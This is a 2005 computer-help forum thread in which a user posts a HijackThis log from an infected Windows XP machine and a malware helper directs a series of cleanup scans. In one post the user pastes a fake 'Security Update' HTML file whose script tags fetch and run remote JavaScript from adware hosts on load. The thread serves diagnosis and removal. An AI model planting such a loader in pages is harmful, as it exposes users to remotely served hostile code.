Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Hijack this - please help diagnose


  • Please log in to reply
5 replies to this topic

#1 hollybthwest

hollybthwest

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:43 AM

Posted 30 July 2005 - 03:54 PM

Logfile of HijackThis v1.99.1
Scan saved at 3:47:49 PM, on 7/30/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\CA\eTrust Antivirus\InoRpc.exe
C:\Program Files\CA\eTrust Antivirus\InoRT.exe
C:\Program Files\CA\eTrust Antivirus\InoTask.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\netddf.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb05.exe
C:\WINDOWS\System32\hphmon04.exe
C:\PROGRA~1\CA\ETRUST~1\realmon.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe
C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe
C:\WINDOWS\System32\igfxtray.exe
C:\WINDOWS\System32\hkcmd.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\Playlist.exe
C:\WINDOWS\System32\cstr.exe
C:\WINDOWS\System32\HPHipm11.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\PROGRA~1\CA\SHARED~1\SCANEN~1\InoDist.exe
C:\Documents and Settings\Jonna\Local Settings\Temp\Temporary Directory 1 for HijackThis.zip\HijackThis.exe
C:\WINDOWS\System32\notepad.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.microsoft.com/isapi/redir.dll?p...er=6&ar=msnhome
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?p...B_PVER}&ar=home
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://red.clientapps.yahoo.com/customize/...//www.yahoo.com
R3 - Default URLSearchHook is missing
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\ycomp5_5_7_0.dll (file missing)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\ycomp5_5_7_0.dll (file missing)
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb05.exe
O4 - HKLM\..\Run: [HPHmon04] C:\WINDOWS\System32\hphmon04.exe
O4 - HKLM\..\Run: [HPHUPD04] "C:\Program Files\HP Photosmart 11\hphinstall\UniPatch\hphupd04.exe"
O4 - HKLM\..\Run: [Realtime Monitor] C:\PROGRA~1\CA\ETRUST~1\realmon.exe -s
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [RoxioEngineUtility] "C:\Program Files\Common Files\Roxio Shared\System\EngUtil.exe"
O4 - HKLM\..\Run: [RoxioDragToDisc] "C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe"
O4 - HKLM\..\Run: [RoxioAudioCentral] "C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe"
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [nvsv32.exe] cstr.exe
O4 - HKLM\..\RunServices: [nvsv32.exe] cstr.exe
O4 - HKLM\..\RunOnce: [nvsv32.exe] cstr.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [nvsv32.exe] cstr.exe
O4 - HKCU\..\RunOnce: [nvsv32.exe] cstr.exe
O8 - Extra context menu item: &AOL Toolbar search - res://C:\Program Files\AOL Toolbar\toolbar.dll/SEARCH.HTML
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://us.dl1.yimg.com/download.yahoo.com/...nst20040510.cab
O16 - DPF: {7C559105-9ECF-42B8-B3F7-832E75EDD959} (Installer Class) - http://www.xxxtoolbar.com/ist/softwares/v4.0/0006_159900.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{DEE25394-3D9C-409D-8CE2-1D2744199A84}: NameServer = 207.173.86.6 209.63.0.6
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O23 - Service: eTrust Antivirus RPC Server (InoRPC) - Computer Associates International, Inc. - C:\Program Files\CA\eTrust Antivirus\InoRpc.exe
O23 - Service: eTrust Antivirus Realtime Server (InoRT) - Computer Associates International, Inc. - C:\Program Files\CA\eTrust Antivirus\InoRT.exe
O23 - Service: eTrust Antivirus Job Server (InoTask) - Computer Associates International, Inc. - C:\Program Files\CA\eTrust Antivirus\InoTask.exe
O23 - Service: Pml Driver HPH11 - HP - C:\WINDOWS\System32\HPHipm11.exe
O23 - Service: ssdfghjkl - Unknown owner - C:\WINDOWS\netddf.exe

BC AdBot (Login to Remove)

 


#2 SifuMike

SifuMike

    malware expert


  • Staff Emeritus
  • 15,385 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Vancouver (not BC) WA (Not DC) USA
  • Local time:10:43 PM

Posted 30 July 2005 - 09:30 PM

Hello hollybthwest,

You have some worms on your computer. Lets start out with some scans, as they may remove them all.

Please confirm that you have run the following scans or run them now.
Save any logs that you generate - we may need them later.
Do not post any logs unless I ask you.

Also, please provide me with a description of the problem you are experiencing.

***************************************************

Please download, update and run (one at a time of course!)
Spybot 1.4 and Adaware SE 1.06.r1

Fix whatever they suggest.

***************************************************

If you need help running these tools, here are some helpful tutorials.
Spybot Tutorial
Adaware SE Tutorial


***************************************************

Be sure to run Adaware SE with a Full Scan in the Safe Mode.

How to Reboot into Safe Mode
tap F8 key during reboot, until the boot menu appears...use the arrow keys to choose "Safe Mode" from the menu......,then press the "Enter" key.


The following explains how to set Ad-aware's settings to perform a "Full Scan."

In Ad-aware click the Gear to go to the Settings area.

The following items should be on a green check, not on a red X.

Under the Scanning button:
Scan within archives
Under Memory & Registry, Check EVERYTHING
In Check Drives & Folders, make sure all of your hard drives are selected

Under the Advanced button, check ALL under Log detail level.

Under the Tweak button...

Some of these may not be an available option, depending on your version of Ad-aware and your version of Windows. Do not be concerned if you cannot select a certain item.

In Scanning Engine:
Unload recognized processes during scanning
Include info about ignored objects in logfile, if detected in scan
Include basic Ad-aware settings in logfile
Include additional Ad-aware settings in logfile
Include used command line parameters in logfile

In Cleaning Engine:
XP/2000: Allow unloading explorer to unload shell extensions prior to deletion
Let Windows remove files in use at next reboot
UNCHECK: Automatically try to unregister objects prior to deletion

Click Proceed to save these settings. When you would like to perform a "Full Scan," switch the scan mode from SmartScan to Custom.


***************************************************


Please download, update and run the free A2 (A squared) anti-trojan

Let it fix whatever it wants to. Save the log file by clicking on "Save HTML-Report".

***************************************************


I know you may have anti-virus software, but sometimes its definitions are corrupted due to malware. Online scans are the best resort in this case.
Run this pc through the
Trend Micro Housecall Online virus scanner (Beta)
or
Panda Scan Online virus scanner

Let it delete whatever it finds. If it cannot delete it, then post the names and locations of those files and we will delete it manully.

***************************************************

C:\Documents and Settings\Jonna\Local Settings\Temp\Temporary Directory 1 for HijackThis.zip\HijackThis.exe


You presently have Hijackthis in a temp folder. It won't save the backups if it is run from a temporary folder. Put Hijackthis in it own fole (but not a temp folder).

Here is how to make a Hijackthis folder:

Click My Computer, then C:\
In the menu bar, File->New->Folder.
That will create a folder named New Folder, which you can rename to "HJT". Now you have C:\HJT\ folder.
Put your hijackthis.exe there.


Next, reboot and post a fresh HijackThis log to this thread.

Edited by SifuMike, 30 July 2005 - 09:33 PM.

If I've saved you time & money,
please make a donation so I can keep helping people just like you! You can donate using a credit card and PayPal. Thank you!



Posted Image

Asking for help via Private Message or Mail will be ignored - So If you need help, post your problem in the forum.

#3 hollybthwest

hollybthwest
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:43 AM

Posted 31 July 2005 - 10:47 AM

Okay SifuMike, I will try your tips and see what happens. The problem we are having is that we cannot access windows update, and within the Temp folder is a file that appears to have something to do with that. Part of it references something like static.windowsupdate.com and something tried to connect when we get on The Internet...vague I know. We tried to delete it in safe mode, and still it returns. I will try your suggestions and then get back with you with specifics if I can't resolve. Thank you so much!!!!

#4 hollybthwest

hollybthwest
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:43 AM

Posted 01 August 2005 - 10:30 AM

Here is an HTML file I cannot get rid of, even in Safe Mode, it is in the Temp folder. I wonder if this is why I cannot access Windows Updates, as well as the source of other issues

<html>
<title>Security Update</title>
<head></head>
<body>
<script language='javascript' type ='text/javascript'
src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2
&loadfirst=1&delayload=0&account_id=159900
&recurrence=always&adid=alll7836900&event_type=onload&signature=159900'>
</script>
<script language="javascript">self.focus();</script>

<script language='javascript' type ='text/javascript'
src="http://static.windupdates.com?prompts/a374aa74/a076ac74.js">
</script>
<script language="javascript">self.focus();</script>
</body>
</html>

#5 SifuMike

SifuMike

    malware expert


  • Staff Emeritus
  • 15,385 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Vancouver (not BC) WA (Not DC) USA
  • Local time:10:43 PM

Posted 01 August 2005 - 12:51 PM

Hi hollybthwest,

Here is an HTML file I cannot get rid of, even in Safe Mode, it is in the Temp folder. I wonder if this is why I cannot access Windows Updates, as well as the source of other issues


No, that is not the cause. The worm and red sheriff infections are the cause.

Here is an HTML file I cannot get rid of, even in Safe Mode, it is in the Temp folder


That is not a major problem. Your major problem is the worm and Red Sheriff infection you have on your computer.

Have you run the Spybot, Adware, A2, TrendMicro scans yet?
If so, then post a fresh Hijackthis log.


Let's empty the temp files:

Download CCleaner and install it. (default location is best).
Select the Windows Tab, Run CCleaner ,(click Run Cleaner (bottom right) then, when it finishes scanning click Exit.)
When you see "Complete" on the top line, it's done. It's very fast.

I recommend that you DO NOT run anything under the Issues Tab and the Applications Tab. To prevent accidently running the Issues Tab and Applicatons tabs, clear all check boxes are under them.

Edited by SifuMike, 01 August 2005 - 10:54 PM.

If I've saved you time & money,
please make a donation so I can keep helping people just like you! You can donate using a credit card and PayPal. Thank you!



Posted Image

Asking for help via Private Message or Mail will be ignored - So If you need help, post your problem in the forum.

#6 hollybthwest

hollybthwest
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:43 AM

Posted 01 August 2005 - 03:31 PM

Will do...Thanks and I will let you know!




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users